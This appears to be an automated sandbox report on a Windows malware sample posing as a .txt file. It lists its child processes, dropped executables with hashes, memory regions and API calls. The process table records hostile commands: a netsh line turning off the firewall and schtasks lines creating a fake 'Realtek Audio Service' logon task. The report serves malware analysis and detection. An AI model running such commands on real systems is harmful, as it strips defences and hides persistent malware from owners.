7eef6ef8...5792 | Sequential Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Riskware, Dropper, Downloader, Trojan, Backdoor, Spyware

7eef6ef8fed53b7c3bf61ba821f375a0a433ea4cb0185fd223780b729a9a5792 (SHA256)

output.113528456.txt.exe

Windows Exe (x86-32)

Created at 2018-08-10 04:08:00

Notifications (1/1)

The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x9a4 Analysis Target High (Elevated) output.113528456.txt.exe "C:\Users\EEBsYm5\Desktop\output.113528456.txt.exe" -
#2 0xa54 Child Process High (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c netsh Advfirewall set allprofiles state off #1
#3 0xa70 Child Process High (Elevated) netsh.exe netsh Advfirewall set allprofiles state off #2
#5 0xba4 Child Process High (Elevated) vkvmtnchwv3w.exe "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe" #1
#6 0xbb8 Child Process High (Elevated) vkvmtnchwv3w.exe "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe" #5
#7 0xbf4 Child Process High (Elevated) jrsi6vakyydz.exe "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" #1
#9 0xc88 Child Process High (Elevated) schtasks.exe "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" /rl HIGHEST /f #7
#10 0x58c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {7737867F-ACDD-43AC-B745-B8B549957EED} S-1-5-21-3785418085-2572485238-895829336-1000:CRH2YWU7\EEBsYm5:Interactive:Highest[1] #9
#11 0xca0 Child Process High (Elevated) realtekaudio.exe "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" #7
#12 0xcec Child Process High (Elevated) schtasks.exe "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f #11

Behavior Information - Sequential View

Process #1: output.113528456.txt.exe
304 291
»
Information Value
ID #1
File Name c:\users\eebsym5\desktop\output.113528456.txt.exe
Command Line "C:\Users\EEBsYm5\Desktop\output.113528456.txt.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:01:33, Reason: Self Terminated
Monitor Duration 00:01:07
OS Process Information
»
Information Value
PID 0x9a4
Parent PID 0x5ac (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9A8
0x A3C
0x A40
0x A44
0x A48
0x A4C
0x A50
0x A80
0x A84
0x AA4
0x AA8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory rw True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory rw True False False -
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory - True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory - True False False -
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory - True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory - True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory - True False False -
private_0x0000000000150000 0x00150000 0x0015ffff Private Memory - True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory rw True False False -
private_0x0000000000170000 0x00170000 0x0026ffff Private Memory rw True False False -
rpcss.dll 0x00270000 0x002cbfff Memory Mapped File r False False False -
l_intl.nls 0x00270000 0x00272fff Memory Mapped File r False False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory r True False False -
private_0x0000000000290000 0x00290000 0x0029ffff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002affff Private Memory - True False False -
sorttbls.nlp 0x002b0000 0x002b4fff Memory Mapped File r False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory r True False False -
windowsshell.manifest 0x002d0000 0x002d0fff Memory Mapped File r False False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory r True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
pagefile_0x00000000003e0000 0x003e0000 0x004a7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000004b0000 0x004b0000 0x004b1fff Pagefile Backed Memory r True False False -
private_0x00000000004c0000 0x004c0000 0x004fffff Private Memory rwx True False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory rw True False False -
pagefile_0x0000000000510000 0x00510000 0x00610fff Pagefile Backed Memory r True False False -
sortkey.nlp 0x00620000 0x00660fff Memory Mapped File r False False False -
pagefile_0x0000000000670000 0x00670000 0x00670fff Pagefile Backed Memory r True False False -
private_0x0000000000680000 0x00680000 0x0068ffff Private Memory rw True False False -
private_0x0000000000690000 0x00690000 0x0072ffff Private Memory rw True False False -
oleaccrc.dll 0x00730000 0x00730fff Memory Mapped File r False False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory rw True False False -
pagefile_0x0000000000750000 0x00750000 0x00751fff Pagefile Backed Memory r True False False -
private_0x0000000000760000 0x00760000 0x0079ffff Private Memory rwx True False False -
private_0x00000000007a0000 0x007a0000 0x0089ffff Private Memory rw True False False -
pagefile_0x00000000008a0000 0x008a0000 0x008a6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008b0000 0x008b0000 0x008b1fff Pagefile Backed Memory rw True False False -
cversions.1.db 0x008c0000 0x008c3fff Memory Mapped File r True False False -
cversions.2.db 0x008c0000 0x008c3fff Memory Mapped File r True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db 0x008d0000 0x008eefff Memory Mapped File r True False False -
pagefile_0x00000000008f0000 0x008f0000 0x008f0fff Pagefile Backed Memory rw True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x00900000 0x0092ffff Memory Mapped File r True False False -
cversions.2.db 0x00930000 0x00933fff Memory Mapped File r True False False -
private_0x0000000000940000 0x00940000 0x00a3ffff Private Memory rw True False False -
sortdefault.nls 0x00a40000 0x00d0efff Memory Mapped File r False False False -
pagefile_0x0000000000d10000 0x00d10000 0x00d10fff Pagefile Backed Memory rw True False False -
rsaenh.dll 0x00d20000 0x00d5bfff Memory Mapped File r False False False -
pagefile_0x0000000000d20000 0x00d20000 0x00d20fff Pagefile Backed Memory r True False False -
private_0x0000000000d30000 0x00d30000 0x00d3ffff Private Memory - True False False -
private_0x0000000000d40000 0x00d40000 0x00ddffff Private Memory rw True False False -
private_0x0000000000d40000 0x00d40000 0x00d4ffff Private Memory - True False False -
private_0x0000000000d50000 0x00d50000 0x00e4ffff Private Memory rw True False False -
pagefile_0x0000000000d50000 0x00d50000 0x00d60fff Pagefile Backed Memory rw True False False -
private_0x0000000000e50000 0x00e50000 0x00fdffff Private Memory rw True False False -
pagefile_0x0000000000e50000 0x00e50000 0x00f2efff Pagefile Backed Memory r True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x00f30000 0x00f95fff Memory Mapped File r True False False -
private_0x0000000000fa0000 0x00fa0000 0x00fdffff Private Memory rw True False False -
private_0x0000000001020000 0x01020000 0x0111ffff Private Memory rw True False False -
private_0x0000000001120000 0x01120000 0x01220fff Private Memory rw True False False -
private_0x0000000001120000 0x01120000 0x0121ffff Private Memory rw True False False -
output.113528456.txt.exe 0x01280000 0x01287fff Memory Mapped File rwx True True False
pagefile_0x0000000001290000 0x01290000 0x01e8ffff Pagefile Backed Memory r True False False -
private_0x0000000001e90000 0x01e90000 0x03e8ffff Private Memory rw True False False -
pagefile_0x0000000003e90000 0x03e90000 0x04282fff Pagefile Backed Memory r True False False -
private_0x0000000004340000 0x04340000 0x0443ffff Private Memory rw True False False -
private_0x0000000004490000 0x04490000 0x0458ffff Private Memory rw True False False -
private_0x00000000046b0000 0x046b0000 0x047affff Private Memory rw True False False -
private_0x00000000047b0000 0x047b0000 0x0493ffff Private Memory rw True False False -
private_0x00000000049b0000 0x049b0000 0x04aaffff Private Memory rw True False False -
wminet_utils.dll 0x6a310000 0x6a318fff Memory Mapped File rwx True False False -
system.ni.dll 0x6b7a0000 0x6bf3bfff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x6bf40000 0x6ca37fff Memory Mapped File rwx True False False -
mscorwks.dll 0x6ca40000 0x6cfeafff Memory Mapped File rwx True False False -
ieframe.dll 0x6cff0000 0x6da6ffff Memory Mapped File rwx False False False -
system.management.ni.dll 0x6de80000 0x6df83fff Memory Mapped File rwx True False False -
msvcr80.dll 0x6e180000 0x6e21afff Memory Mapped File rwx False False False -
wmiutils.dll 0x6e880000 0x6e896fff Memory Mapped File rwx False False False -
wbemprox.dll 0x6ebe0000 0x6ebe9fff Memory Mapped File rwx False False False -
ntdsapi.dll 0x6ebf0000 0x6ec07fff Memory Mapped File rwx False False False -
fastprox.dll 0x6ec10000 0x6eca5fff Memory Mapped File rwx False False False -
wbemsvc.dll 0x6ef00000 0x6ef0efff Memory Mapped File rwx False False False -
system.serviceprocess.ni.dll 0x6efa0000 0x6efd6fff Memory Mapped File rwx True False False -
wbemcomn.dll 0x6f7c0000 0x6f81bfff Memory Mapped File rwx False False False -
mscorjit.dll 0x6f900000 0x6f95afff Memory Mapped File rwx True False False -
mscoreei.dll 0x6f960000 0x6f9d7fff Memory Mapped File rwx True False False -
apphelp.dll 0x718b0000 0x718fbfff Memory Mapped File rwx False False False -
mscoree.dll 0x71de0000 0x71e29fff Memory Mapped File rwx True False False -
oleacc.dll 0x72360000 0x7239bfff Memory Mapped File rwx False False False -
ntmarta.dll 0x73c00000 0x73c20fff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
propsys.dll 0x74220000 0x74314fff Memory Mapped File rwx False False False -
comctl32.dll 0x74360000 0x744fdfff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
devobj.dll 0x75400000 0x75411fff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
wldap32.dll 0x75730000 0x75774fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
psapi.dll 0x75820000 0x75824fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
setupapi.dll 0x764b0000 0x7664cfff Memory Mapped File rwx False False False -
wininet.dll 0x76650000 0x76744fff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
urlmon.dll 0x76e70000 0x76fa5fff Memory Mapped File rwx False False False -
iertutil.dll 0x76fb0000 0x771aafff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
private_0x000000007ff50000 0x7ff50000 0x7ff5ffff Private Memory rwx True False False -
private_0x000000007ff60000 0x7ff60000 0x7ffaffff Private Memory rwx True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 30 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe 213.50 KB MD5: 1e8073f6a1421490fc093196e4eb884e
SHA1: 25b6296a419e8471ec899b8e1996fb20c5845c22
SHA256: d9a967d0caa8db86feca3ae469ef6797e81dfdac4d8531658cb242a87c80ce05
SSDeep: 6144:q+8ZepOGuDnw9tOJavXhe9Tedm/8b1tnzwa:qjZepgDj44Iyctnx
True
C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe 4.96 MB MD5: 314d3c1ebe50ebc5d9809039ae02ba40
SHA1: 7029f1565d8cb5334d8d19f9b4e0797611037570
SHA256: 268909bc33f0f8c5312b51570016311e3676af651a57de38e42241dcc177b2d6
SSDeep: 98304:5oMp0qQF33UiVuCsLeSInsi7luD4bl5RNRn31wstaUIXke5R2/JJ:aQXG3UeupvIsi7luDspNx1TiXLRSJ
False
Threads
Thread 0x9a8
286 285
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Get Info service_name = MpsSvc True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_attributes False 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 554 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\Desktop\output.113528456.txt.config, type = file_attributes False 2
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = CRH2YWU7 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Module Map process_name = c:\users\eebsym5\desktop\output.113528456.txt.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System Get Info type = Operating System True 2
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
